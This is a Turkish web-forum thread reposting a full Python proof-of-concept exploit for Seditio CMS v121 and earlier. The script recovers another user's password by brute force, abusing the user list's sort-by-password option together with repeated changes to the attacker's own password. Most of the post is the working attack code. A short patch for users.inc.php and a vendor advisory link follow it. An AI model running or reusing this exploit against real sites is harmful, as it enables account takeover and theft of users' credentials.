> 1 <
| Yazan | Mesaj |
|
#1478 2009-10-12 09:10 GMT |
|
03.05.2009
Seditio <= v121 User Password Dichotomic Bruteforce PoC Exploit Kod: #!/usr/bin/env python"""Seditio <= v121 User Password Dichotomic Bruteforce PoC Exploitby cr0w [ http://cr0w-at.blogspot.com ]Vendor site: http://www.neocrome.netSeditio v121 download link: http://www.neocrome.net/files/120/code/seditio-build121.rarBased on vulnerability founded by Red_Red1. It was discussed here (in russian):http://forum.antichat.ru/showthread.php?p=617264More info about this web attack method you can find here (in russian): http://cr0w-at.blogspot.com/2009/05/order-by-sql-1.html"""import reimport sysimport md5import getoptimport urllibimport urllib2import cookielibfrom math import ceilclass Dicho: def __init__(self, list): self.count = 0 self.current_pos = None self.list = list def passwords(self): return self.list def pass_len(self): return len(self.list) def next_pass(self): if len(self.list)<=2: return None self.current_pos = int(ceil(len(self.list)/2)) self.count += 1 return self.list[self.current_pos] def user_upper(self): self.list = self.list[self.current_pos:] def target_upper(self): self.list = self.list[0:self.current_pos+1] def usage(): print """Seditio <= v121 User Password Dichotomic Bruteforce PoC Exploit\nUsage:\n%s unsorted_passlist.txt [-o passlist.txt]%s http://vuln.site -u user -p password -t target_user [-l passlist.txt]""" \ % (sys.argv[0], sys.argv[0]) sys.exit()def sort_file(input_file, output_file): print "[~] Passlist sorting" try: words = [line.rstrip() for line in open(input_file)] except: sys.exit("[!] Can't read " + input_file) try: output = open(output_file, 'w') except: sys.exit("[!] Can't open " + output_file) words = map(lambda word: md5.new(word).hexdigest()+word, words) words.sort() [output.write(word[32:]+"\n") for word in words] print u"[+] Done! Sorted passlist with %i words here: %s" % (len(words), output_file) sys.exit()def user_auth(user, password): print "[~] Authorization" data = urllib.urlencode( {'rusername': user, 'rpassword': password, 'rcookiettl': '86400', 'x': 'GUEST'}) try: req = urllib2.Request(url+"/users.php?m=auth&a=check&redirect=", data=data, headers=headers) page = urllib2.urlopen(req) if page.geturl().find('msg=104') > 5: print u"[+] User %s logged" % user return True else: print u"[-] User %s not logged" % user return False except: print "[!] Can't authorize" return Falsedef password_change(new_password): global password print u"[~] Password change from '%s' to '%s'" % (password, new_password), try: req = urllib2.Request(url+"/users.php?m=profile", headers=headers) page = urllib2.urlopen(req).read() x_value = re.search(r'<input type="hidden" id="x" name="x" value="(.*)" />', page).group(1) data = urllib.urlencode({"rnewpass1": new_password, "rnewpass2": new_password, "x": x_value}) req = urllib2.Request(url+"/users.php?m=profile&a=update&x="+x_value, data=data, headers=headers) page = urllib2.urlopen(req) if page.geturl().find("msg=113") > 0: print "[changed]" password = new_password except: print "[-] Error: can't change password or something else" sys.exit() def parse_userlist(user, target_user): d_value = 0 while d_value < 1000: try: req = urllib2.Request( url+"/users.php?f="+f_value+"&s=password&w=asc&g=&gm=&d="+str(d_value), headers=headers) page = urllib2.urlopen(req).read() users = re.findall(r'<a href="users.php\?m=details&id=\d+">(.*)</a>', page) if (user in users) and (target_user in users): if users.index(user) < users.index(target_user): return user else: return target_user elif user in users: return user elif target_user in users: return target_user else: d_value += 50 continue raise Error except: print "[-] Error: can't parse userlist" sys.exit()# Defaults headers = {}sorted_file = 'passlist.txt'pass_file = 'passlist.txt'try: opts, args = getopt.getopt(sys.argv[2:], "o:u:p:t:l:")except getopt.GetoptError, err: usage()for opt, arg in opts: if opt == '-o': sorted_file = arg elif opt == '-u': user = arg elif opt == '-p': password = arg elif opt == '-t': target_user = arg elif opt == '-l': pass_file = arg else: usage()try: sys.argv[1]except: usage()if sys.argv[1].startswith('http'): url = sys.argv[1]else: sort_file(sys.argv[1], sorted_file)first_pass = password[:]if user[0:1].upper() == target_user[0:1].upper(): f_value = user[0:1].upper()else: f_value = 'all'try: dic = Dicho([line.rstrip() for line in open(pass_file)])except: sys.exit("Can't open " + pass_file)cookies = cookielib.CookieJar()opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies))urllib2.install_opener(opener)if not user_auth(user, password): print "[!] Can't authorize" sys.exit()while True: new_pass = dic.next_pass() if new_pass == None: break print "[~] %i. %i passwords in memory" % (dic.count, dic.pass_len()) password_change(new_pass) if parse_userlist(user, target_user) == user: dic.user_upper() else: dic.target_upper() print "[~] Return old password to %s" % userpassword_change(first_pass)cookies.clear() for passwords in dic.passwords(): print u"[~] Trying password '%s' for %s" % (passwords, target_user) if user_auth(target_user, passwords): print "[+] Success!\a" print u"\n[+] %s:%s" % (target_user, passwords) sys.exit()print u"\n[-] Password for %s not founded" % target_user# by cr0w Nasıl Korunabilirim Diyorsanız ?: system/core/users/users.inc.php aç alttakini bul Kod: if (empty($s)) { $s = 'name'; } Alttakiyle degiştir. Kod: if (empty($s) || strtolower($s) == 'password') { $s = 'name'; } Neocrome.Net Duyurusu: http://neocrome.net/plug.php?e=tracker&m=bview&pr=1&id=430 |
|
|
Her türlü seditio skin , eklenti , site geliştirme , teknik destek, seo vs... konular uygun fiyatlarla yapılır.
İletisim : webtasarimer@hotmail.com Yada pm yoluyla ulaşabilirsiniz. |
| Yazan | Mesaj |
|
#1501 2009-11-15 20:12 GMT |
|
eyw
|
|
> 1 <
